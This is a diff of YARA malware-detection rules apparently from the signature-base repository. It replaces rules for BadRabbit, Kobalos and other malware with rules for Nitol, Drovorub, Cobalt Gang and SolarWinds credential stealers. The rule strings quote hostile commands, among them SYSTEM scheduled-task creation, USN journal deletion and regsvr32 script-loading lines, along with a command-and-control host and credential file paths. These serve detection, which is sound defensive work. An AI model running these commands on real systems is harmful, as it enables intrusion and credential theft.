+rule SIGNATURE_BASE_Backdoor_Redosdru_Jun17 : HIGHVOL FILE
 {
 	meta:
-		description = "Detects BadRabbit Ransomware"
+		description = "Detects malware Redosdru - file systemHome.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "272e50f8-5aef-52ec-a5d0-01e8504d6c55"
-		date = "2017-10-25"
+		id = "ea038142-6903-5d08-ac89-70c1bbef716c"
+		date = "2017-06-04"
 		modified = "2023-12-05"
-		reference = "https://pastebin.com/Y7pJv3tK"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_badrabbit.yar#L11-L40"
+		reference = "https://goo.gl/OOB3mH"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eternalblue_non_wannacry.yar#L12-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "21c63a02d0284ce759b087f4869c4ed8e6b50c37ffeb724538567e28aeae16ac"
+		logic_hash = "99218c4decf98f02eb75c3c41a56f857a07779c68d30c4d16ca605052c4f9c3e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93"
-		hash2 = "579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648"
-		hash3 = "630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da"
+		hash1 = "4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309"
 
 	strings:
-		$x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST" fullword wide
-		$x2 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\"" fullword wide
-		$x3 = "C:\\Windows\\infpub.dat" fullword wide
-		$x4 = "C:\\Windows\\cscc.dat" fullword wide
-		$s1 = "need to do is submit the payment and get the decryption password." fullword ascii
-		$s2 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" fullword wide
-		$s3 = "\\\\.\\pipe\\%ws" fullword wide
-		$s4 = "fsutil usn deletejournal /D %c:" fullword wide
-		$s5 = "Run DECRYPT app at your desktop after system boot" fullword ascii
-		$s6 = "Files decryption completed" fullword wide
-		$s7 = "Disable your anti-virus and anti-malware programs" fullword wide
-		$s8 = "SYSTEM\\CurrentControlSet\\services\\%ws" fullword wide
-		$s9 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide
-		$s10 = "%ws C:\\Windows\\%ws,#1 %ws" fullword wide
+		$x1 = "%s\\%d.gho" fullword ascii
+		$x2 = "%s\\nt%s.dll" fullword ascii
+		$x3 = "baijinUPdate" fullword ascii
+		$s1 = "RegQueryValueEx(Svchost\\netsvcs)" fullword ascii
+		$s2 = "serviceone" fullword ascii
+		$s3 = "\x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#f \x1f#" fullword ascii
+		$s4 = "servicetwo" fullword ascii
+		$s5 = "UpdateCrc" fullword ascii
+		$s6 = "\x1f#[ \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#" fullword ascii
+		$s7 = "nwsaPAgEnT" fullword ascii
+		$s8 = "%-24s %-15s 0x%x(%d) " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Badrabbit_Mimikatz_Comp : FILE
+rule SIGNATURE_BASE_Backdoor_Nitol_Jun17 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52affd3f-6bf9-55f6-92a5-69314a2e76e0"
-		date = "2017-10-25"
-		modified = "2023-12-05"
-		reference = "https://pastebin.com/Y7pJv3tK"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_badrabbit.yar#L42-L59"
+		id = "7dd26868-59e0-51a1-b12a-3b69d6246ff5"
+		date = "2017-06-04"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/OOB3mH"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eternalblue_non_wannacry.yar#L38-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9d12d9331686a54e8d32f94761e4889710bbd2432d4cb2e4e7e3f21ef6aa082a"
+		logic_hash = "9035b8bd74c284f170f8c9767d96580dba243786abaa3b2e79e05a981f8fa204"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035"
+		hash1 = "cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946"
 
 	strings:
-		$s1 = "%lS%lS%lS:%lS" fullword wide
-		$s2 = "lsasrv" fullword wide
-		$s3 = "CredentialKeys" ascii
-		$s4 = { 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00 }
+		$x1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
+		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
+		$x3 = "TCPConnectFloodThread.target = %s" fullword ascii
+		$s1 = "\\Program Files\\Internet Explorer\\iexplore.exe" ascii
+		$s2 = "%c%c%c%c%c%c.exe" fullword ascii
+		$s3 = "GET %s%s HTTP/1.1" fullword ascii
+		$s4 = "CCAttack.target = %s" fullword ascii
+		$s5 = "Accept-Language: zh-cn" fullword ascii
+		$s6 = "jdfwkey" fullword ascii
+		$s7 = "hackqz.f3322.org:8880" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Gen_Macro_Shellexecute_Action : FILE
+rule SIGNATURE_BASE_HKTL_Solarwinds_Credential_Stealer : FILE
 {
 	meta:
-		description = "VBA macro technique to call ShellExecute to launch payload"
-		author = "John Lambert @JohnLaTwC"
-		id = "4ae3d3d9-de4a-5c5c-9a4a-bedc80b576be"
-		date = "2019-01-08"
+		description = "Detects solarwinds credential stealers like e.g. solarflare via the touched certificate, files and database columns"
+		author = "Arnim Rupp"
+		id = "87dba889-367a-5fc3-b5e0-eb8e3c36a5e9"
+		date = "2021-01-20"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/1091170625698316288"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_macro_ShellExecute_action.yar#L1-L33"
+		reference = "https://github.com/mubix/solarflare"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_solarwinds_credential_stealer.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "da40175579f7d76d10ad0188851f111ba5d875ce990b2940166dd28eac2a742d"
+		hash = "1b2e5186464ed0bdd38fcd9f4ab294a7ba28bd829bf296584cbc32e2889037e4"
+		hash = "4adb69d4222c80d97f8d64e4d48b574908a518f8d504f24ce93a18b90bd506dc"
+		logic_hash = "ccf55ba7b66ff8d0f926999f3d68dc3b2fdc1c9ce15e1f08b75d003c62393312"
 		score = 75
-		quality = 85
+		quality = 51
 		tags = "FILE"
-		note = "This rule only works on VT or systems that perform macro subfile extraction"
-		hash1 = "0878eec9ecae493659e42c1d87588573c1e6fc30acf7a59e6fdb5296b1c198ef"
-		hash2 = "a0963ac15339c9803b4355fd71b68bf6ddedad960d5b3ad40bae873263470191"
-		hash3 = "dd094e44a817604596d1ab06ca6e9597d49ca0a2cbe9239c73ceaad70265ec2a"
-		hash4 = "7b9094ea41e89379c7048ef784ef494c4597ea0d31b707dcb9c8495f241f5fb0"
-		hash5 = "35d8242726b905882bbfcf2770f84cb6f40552e76bff8fb0082ca10de3d61e54"
-		hash6 = "bf9ff20d814bf21d46a22abbd7a8ad0276145807f9adf8d2787df9e3fce3f35d"
-		hash7 = "77966004fcbff147f6923b3405ad9ad4e1dda42d0931564d0cdc4c7e1c91106a"
-		hash8 = "c77c8033a1e5f694fa119dd7f78811f6015726822121b9414fc01e7de8770447"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$com1a = "00A0C91F3880"
-		$com1b = "C08AFD90"
-		$com2a = "00A0C90A8F39"
-		$com2b = "9BA05972"
-		$s3 = "ShellExecute" fullword
-		$s4 = "GetObject" fullword
+		$certificate = "CN=SolarWinds-Orion" ascii nocase wide
+		$credfile1 = "\\CredentialStorage\\SolarWindsDatabaseAccessCredential" ascii nocase wide
+		$credfile2 = "\\KeyStorage\\CryptoHelper\\default.dat" ascii nocase wide
+		$credfile3 = "\\Orion\\SWNetPerfMon.DB" ascii nocase wide
+		$credfile4 = "\\Orion\\RabbitMQ\\.erlang.cookie" ascii nocase wide
+		$sql1 = "encryptedkey" ascii nocase wide fullword
+		$sql2 = "protectiontype" ascii nocase wide fullword
+		$sql3 = "CredentialProperty" ascii nocase wide fullword
+		$sql4 = "passwordhash" ascii nocase wide fullword
+		$sql5 = "credentialtype" ascii nocase wide fullword
+		$sql6 = "passwordsalt" ascii nocase wide fullword
 
 	condition:
-		filesize < 1MB and ( uint32be( 0 ) == 0x41747472 or uint32be( 0 ) == 0x61747472 or uint32be( 0 ) == 0x41545452 ) and all of ( $s* ) and ( all of ( $com1* ) or all of ( $com2* ) )
+		uint16( 0 ) == 0x5A4D and $certificate and ( 2 of ( $credfile* ) or 5 of ( $sql* ) )
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Kobalos : FILE
+rule SIGNATURE_BASE_Malrtf_Ole2Link : EXPLOIT FILE
 {
 	meta:
-		description = "Kobalos malware"
-		author = "Marc-Etienne M.Leveille"
-		id = "dfa47e30-c093-57f6-af01-72a2534cc6f4"
-		date = "2020-11-02"
+		description = "Detects weaponized RTF documents with OLE2Link exploit"
+		author = "@h3x2b <tracker _AT h3x.eu>"
+		id = "5080e79a-3abc-5fc3-902e-b362f20510f9"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lnx_kobalos.yar#L32-L57"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_rtf_ole2link.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "48aec47b70633d4c8cb55d90a2e168f3c2027ef27cfe1cd5d30dcdc08a2ff717"
+		logic_hash = "d7ef764a0006b81c2b50699aa1fccb35c7c7da982cb8d56e02097114468e298f"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = "1"
+		tags = "EXPLOIT, FILE"
 
 	strings:
-		$encrypted_strings_sizes = {
-            05 00 00 00 09 00 00 00  04 00 00 00 06 00 00 00
-            08 00 00 00 08 00 00 00  02 00 00 00 02 00 00 00
-            01 00 00 00 01 00 00 00  05 00 00 00 07 00 00 00
-            05 00 00 00 05 00 00 00  05 00 00 00 0A 00 00 00
-        }
-		$password_md5_digest = { 3ADD48192654BD558A4A4CED9C255C4C }
-		$rsa_512_mod_header = { 10 11 02 00 09 02 00 }
-		$strings_rc4_key = { AE0E05090F3AC2B50B1BC6E91D2FE3CE }
+		$rtf_olelink_01 = "\\objdata" nocase
+		$rtf_olelink_02 = "4f4c45324c696e6b" nocase
+		$rtf_olelink_03 = "d0cf11e0a1b11ae1" nocase
+		$rtf_payload_01 = "68007400740070003a002f002f00" nocase
+		$rtf_payload_02 = "680074007400700073003a002f002f00" nocase
+		$rtf_payload_03 = "6600740070003a002f002f00" nocase
 
 	condition:
-		uint16( 0 ) == 0x457f and any of them
+		uint32be( 0 ) == 0x7B5C7274 and all of ( $rtf_olelink_* ) and any of ( $rtf_payload_* )
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Kobalos_SSH_Credential_Stealer : FILE
+rule SIGNATURE_BASE_Duqu1_5_Modules
 {
 	meta:
-		description = "Kobalos SSH credential stealer seen in OpenSSH client"
-		author = "Marc-Etienne M.Leveille"
-		id = "0f923f92-c5d8-500d-9a2e-634ca7945c5c"
-		date = "2020-11-02"
+		description = "Detection for Duqu 1.5 modules"
+		author = "Silas Cutler (havex@chronicle.security)"
+		id = "7239f5e1-c08f-566c-8998-f7dacc2c4a29"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lnx_kobalos.yar#L59-L76"
+		reference = "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu1_5_modules.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fdabaea0c838e43b8716bcd102bdeebf2f08fc041b0b909333e3d9d6f94391fc"
+		hash = "bb3961e2b473c22c3d5939adeb86819eb846ccd07f5736abb5e897918580aace"
+		logic_hash = "795107e227cfb73f6ea09fcdb078f8b57a30d47a2cb702b2d47cc936dea5ae9f"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = "1"
+		tags = ""
 
 	strings:
-		$ = "user: %.128s host: %.128s port %05d user: %.128s password: %.128s"
+		$c1 = "%s(%d)disk(%d)fdisk(%d)"
+		$c2 = "\\Device\\Floppy%d" wide
+		$c3 = "BrokenAudio" wide
+		$m1 = { 81 3F E9 18 4B 7E}
+		$m2 = { 81 BC 18 F8 04 00 00 B3 20 EA B4 }
 
 	condition:
-		uint16( 0 ) == 0x457f and any of them
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Microsoft_7Z_SFX_Combo : FILE
+rule SIGNATURE_BASE_APT_APT28_Generic_Poco_Openssl
 {
 	meta:
-		description = "Detects a suspicious file that has a Microsoft copyright and is a 7z SFX"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9163a689-c3ee-59b1-bf58-aef5d3072be6"
-		date = "2018-09-16"
+		description = "Rule to detect statically linked POCO and OpenSSL libraries (COULD be Drovorub related and should be further investigated)"
+		author = "NSA / FBI"
+		id = "b6d2477b-c9a2-5858-87cf-aa006109bc8f"
+		date = "2020-08-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sfx_with_microsoft_copyright.yar#L1-L24"
+		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28_drovorub.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f48887e0c1031d180e25f2d1b9e016d434f594aef283ab3af8418e86496d2eac"
-		score = 65
+		logic_hash = "b6a78c358b3aee6b172ec29e72ce810c6fbf332f180d5879f0889f47688225e1"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		hash1 = "cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1"
+		tags = ""
 
 	strings:
-		$s1 = "7ZSfx%03x.cmd" fullword wide
-		$s2 = "7z SFX: error" fullword ascii
-		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
-              00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9
-              00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
-              00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F
-              00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20
-              00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68
-              00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72
-              00 76 00 65 00 64 00 2E }
+		$mw1 = { 89 F1 48 89 FE 48 89 D7 48 F7 C6 FF FF FF FF 0F 84 6B 02 00 00 48 F7 C7
+                 FF FF FF FF 0F 84 5E 02 00 00 48 8D 2D }
+		$mw2 = { 41 54 49 89 D4 55 53 F6 47 19 04 48 8B 2E 75 08 31 DB F6 45 00 03 75 }
+		$mw3 = { 85C0BA15000000750989D05BC30F1F44 0000BE }
+		$mw4 = { 53 8A 47 08 3C 06 74 21 84 C0 74 1D 3C 07 74 20 B9 ?? ?? ?? ?? BA FD 03
+                 00 00 BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 E8 06 3C 01 77 2B 48 8B 1F 48 8B 73
+                 10 48 89 DF E8 ?? ?? ?? ?? 48 8D 43 08 48 C7 43 10 00 00 00 00 48 C7 43 28 00 00 00 00 48
+                 89 43 18 48 89 43 20 5B C3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $s* ) and $c1
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Microsoft_RAR_SFX_Combo : FILE
+rule SIGNATURE_BASE_APT_APT28_Drovorub_Library_And_Unique_Strings : FILE
 {
 	meta:
-		description = "Detects a suspicious file that has a Microsoft copyright and is a RAR SFX"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0fa81a9e-2f41-5783-9786-bb6d33b82bd9"
-		date = "2018-09-16"
+		description = "Rule to detect Drovorub-server, Drovorub-agent, and Drovorub-client"
+		author = "NSA / FBI"
+		id = "8e010356-09c7-5897-9cbe-051cd0800502"
+		date = "2020-08-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sfx_with_microsoft_copyright.yar#L27-L50"
+		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28_drovorub.yar#L23-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a0f29fcf86139a6f95b4ab0095154bd26b555f1576b5a2e263c1939bc30e3431"
-		score = 65
+		logic_hash = "adb0d4cb6d589213e6a125d3cc20fcea8164b697bdd24d897ce75e7c7f06120a"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "winrarsfxmappingfile.tmp" fullword wide
-		$s2 = "WinRAR self-extracting archive" fullword wide
-		$s3 = "WINRAR.SFX" fullword
-		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
-              00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9
-              00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
-              00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F
-              00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20
-              00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68
-              00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72
-              00 76 00 65 00 64 00 2E }
+		$s1 = "Poco" ascii wide
+		$s2 = "Json" ascii wide
+		$s3 = "OpenSSL" ascii wide
+		$a1 = "clientid" ascii wide
+		$a2 = "-----BEGIN" ascii wide
+		$a3 = "-----END" ascii wide
+		$a4 = "tunnel" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $s* ) and $c1
+		( filesize > 1MB and filesize < 10MB and ( uint32( 0 ) == 0x464c457f ) ) and ( #s1 > 20 and #s2 > 15 and #s3 > 15 and all of ( $a* ) )
 }
-rule SIGNATURE_BASE_Quarkspwdump_Gen
+rule SIGNATURE_BASE_APT_APT28_Drovorub_Unique_Network_Comms_Strings
 {
 	meta:
-		description = "Detects all QuarksPWDump versions"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7de4f59e-6cf5-5ad7-ae1f-8532d9e80c9e"
-		date = "2015-09-29"
+		description = "Rule to detect Drovorub-server, Drovorub-agent, or Drovorub-client based"
+		author = "NSA / FBI"
+		id = "c6a930e8-c1c0-5d96-9051-7516df848b45"
+		date = "2020-08-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quarkspwdump.yar#L2-L24"
+		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28_drovorub.yar#L44-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "327235260076f97c29acc1ca997205d08ef55fad795594fe2268f1d8e666d636"
-		score = 80
+		logic_hash = "8c82766b76c36fe64c6aa99577e1997d7181dbd36a4c27329845ae8a413f5327"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b86e6aea37c324ce686bd2b49cf5b871d90f51cec24476daa01dd69543b54fa"
-		hash2 = "87e4c76cd194568e65287f894b4afcef26d498386de181f568879dde124ff48f"
-		hash3 = "a59be92bf4cce04335bd1a1fcf08c1a94d5820b80c068b3efe13e2ca83d857c9"
-		hash4 = "c5cbb06caa5067fdf916e2f56572435dd40439d8e8554d3354b44f0fd45814ab"
-		hash5 = "677c06db064ee8d8777a56a641f773266a4d8e0e48fbf0331da696bea16df6aa"
-		hash6 = "d3a1eb1f47588e953b9759a76dfa3f07a3b95fab8d8aa59000fd98251d499674"
-		hash7 = "8a81b3a75e783765fe4335a2a6d1e126b12e09380edc4da8319efd9288d88819"
 
 	strings:
-		$s1 = "OpenProcessToken() error: 0x%08X" fullword ascii
-		$s2 = "%d dumped" fullword ascii
-		$s3 = "AdjustTokenPrivileges() error: 0x%08X" fullword ascii
-		$s4 = "\\SAM-%u.dmp" ascii
+		$s_01 = "action" wide ascii
+		$s_02 = "auth.commit" wide ascii
+		$s_03 = "auth.hello" wide ascii
+		$s_04 = "auth.login" wide ascii
+		$s_05 = "auth.pending" wide ascii
+		$s_06 = "client_id" wide ascii
+		$s_07 = "client_login" wide ascii
+		$s_08 = "client_pass" wide ascii
+		$s_09 = "clientid" wide ascii
+		$s_10 = "clientkey_base64" wide ascii
+		$s_11 = "file_list_request" wide ascii
+		$s_12 = "module_list_request" wide ascii
+		$s_13 = "monitor" wide ascii
+		$s_14 = "net_list_request" wide ascii
+		$s_15 = "server finished" wide ascii
+		$s_16 = "serverid" wide ascii
+		$s_17 = "tunnel" wide ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_BTC_Miner_Lsass1_Chrome_2 : FILE
-{
-	meta:
-		description = "Detects a Bitcoin Miner"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7960d96a-7bd3-5135-867d-e39a02274c45"
-		date = "2017-06-22"
-		modified = "2023-12-05"
-		reference = "Internal Research - CN Actor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_group_btc.yar#L10-L27"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ef80dba71c901d6e821b2e08a701a82f8147e41a8f14c5fd324d5e043b0ff322"
-		score = 60
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "048e9146387d6ff2ac055eb9ddfbfb9a7f70e95c7db9692e2214fa4bec3d5b2e"
-		hash2 = "c8db8469287d47ffdc74fe86ce0e9d6e51de67ba1df318573c9398742116a6e8"
-
-	strings:
-		$x1 = "-t, --threads=N       number of miner threads (default: number of processors)" fullword ascii
-		$x2 = "-O, --userpass=U:P    username:password pair for mining server" fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 6000KB and 1 of them )
-}
-rule SIGNATURE_BASE_CN_Actor_RA_Tool_Ammyy_Mscorsvw : FILE
+rule SIGNATURE_BASE_Cobaltstrike_CN_Group_Beacondropper_Aug17 : FILE
 {
 	meta:
-		description = "Detects Ammyy remote access tool"
+		description = "Detects Script Dropper of Cobalt Gang used in August 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "71a0c5a9-b4dc-508d-a6b7-4b85b75bc34b"
-		date = "2017-06-22"
+		id = "5631b0bc-9e25-524a-9003-73779fd492f7"
+		date = "2017-08-09"
 		modified = "2023-12-05"
-		reference = "Internal Research - CN Actor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_group_btc.yar#L29-L45"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cobaltgang.yar#L15-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c4b64b3aa63d80fa1a73b021bf49539af5888f53090555555c1f3fd7fbb90230"
+		logic_hash = "89db9c5f09afc9cb54fb7a9cd1490373c568ac4dc04bdb9ef71136f91e16ad2c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1831806fc27d496f0f9dcfd8402724189deaeb5f8bcf0118f3d6484d0bdee9ed"
-		hash2 = "d9ec0a1be7cd218042c54bfbc12000662b85349a6b78731a09ed336e5d3cf0b4"
+		hash1 = "fc0fad39b461eb1cfc6be57932993fcea94fca650564271d1b74dd850c81602f"
+		hash2 = "1c845bb0f6b9a96404af97dcafdc77f1629246e840c01dd9f1580a341f554926"
+		hash3 = "6206e372870ea4f363be53557477f9748f1896831a0cdef3b8450a7fb65b86e1"
 
 	strings:
-		$s1 = "Please enter password for accessing remote computer" fullword ascii
-		$s2 = "Die Zugriffsanforderung wurde vom Remotecomputer abgelehnt" fullword ascii
-		$s3 = "It will automatically be run the next time this computer is restart or you can start it manually" fullword ascii
+		$x1 = "WriteLine(\"(new ActiveXObject('WScript.Shell')).Run('cmd /c c:/" ascii
+		$x2 = "WriteLine(\" (new ActiveXObject('WScript.Shell')).Run('regsvr32 /s" ascii
+		$x3 = "sh.Run(env('cmd /c set > %temp%" ascii
+		$x4 = "sh.Run('regsvr32 /s /u /i:" ascii
+		$x5 = ".Get('Win32_ScheduledJob').Create('regsvr32 /s /u /i:" ascii
+		$x6 = "scrobj.dll','********" ascii
+		$x7 = "www.thyssenkrupp-marinesystems.org" fullword ascii
+		$x8 = "f.WriteLine(\" tLnk=env('%tmp%/'+lnkName+'.lnk');\");" fullword ascii
+		$x9 = "lnkName='office 365'; " fullword ascii
+		$x10 = ";sh=x('WScript.Shell');" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them )
+		( filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_CN_Actor_Ammyyadmin : FILE
+rule SIGNATURE_BASE_Cobaltgang_Malware_Aug17_1 : FILE
 {
 	meta:
-		description = "Detects Ammyy Admin Downloader"
+		description = "Detects a Cobalt Gang malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08ffb61a-e2de-538e-9d9f-040276324af9"
-		date = "2017-06-22"
+		id = "56c6f4f8-ccf5-5665-ac21-67f0a9b67cf1"
+		date = "2017-08-09"
 		modified = "2023-12-05"
-		reference = "Internal Research - CN Actor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_group_btc.yar#L47-L61"
